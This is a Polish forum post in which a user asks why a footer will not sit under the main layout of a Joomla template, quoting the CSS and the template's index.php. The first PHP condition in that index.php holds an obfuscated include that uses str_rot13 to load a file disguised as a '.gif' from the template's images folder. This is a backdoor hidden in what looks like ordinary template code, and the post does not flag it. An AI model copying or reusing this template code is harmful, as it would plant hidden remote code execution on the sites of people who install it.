mam mały problem ze stronką która juz prawie skończyłem i na sam koniec ZONK !
Strone moża zobaczyc pod adresem : http://squashpartner.home.pl/squashpartner...ories/index.php
No i niestety ale stopka nie wyświetla sie tak jak powinna.
Chodzi o to, że jak mam na górze banner1, czyli powiedzmy logo, to jest ono pod główną jakby tabelą strony i wszystko jest ok ,
natomiast stopka nie chce mi wejść pod tą tablę stronę.
Jakies pomysły

w pliku CSS mam kod do stopki :
div#stopka{ width:100%; height:150px; text-align:center; background: #fff url(../images/doool.png) top no-repeat; position: absolut; }
natomiast w index.php taki kod:
<body id="page_bg"> <?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?> <jdoc:include type="modules" name="layout" style="rounded" /> <?php endif; ?> <?php include('functions.php'); ?> <div id="glowna"> <div id="main_bg" class="banner1"> <div id="h_area"> <?php if($this->countModules('left')) : ?> <div id="leftcolumn"> <jdoc:include type="modules" name="left" style="rounded" /><?php endif; ?> </div> <?php if($this->countModules('left') xor $this->countModules('right')) $maincol_sufix = '_middle'; elseif(!$this->countModules('left') and !$this->countModules('right'))$maincol_sufix = '_big'; else $maincol_sufix = ''; ?> <div id="maincolumn"><?php echo $maincol_sufix; ?> <jdoc:include type="message" /> </div> <?php if($this->countModules('right') and JRequest::getCmd('layout') != 'form') : ?> <div id="rightcolumn"> <jdoc:include type="modules" name="right" style="xhtml"/> <br /> </div> <?php endif; ?> <br clear="all" /> </div> <div id="stopka"> </div> </div>
Bardzo proszę o pomoc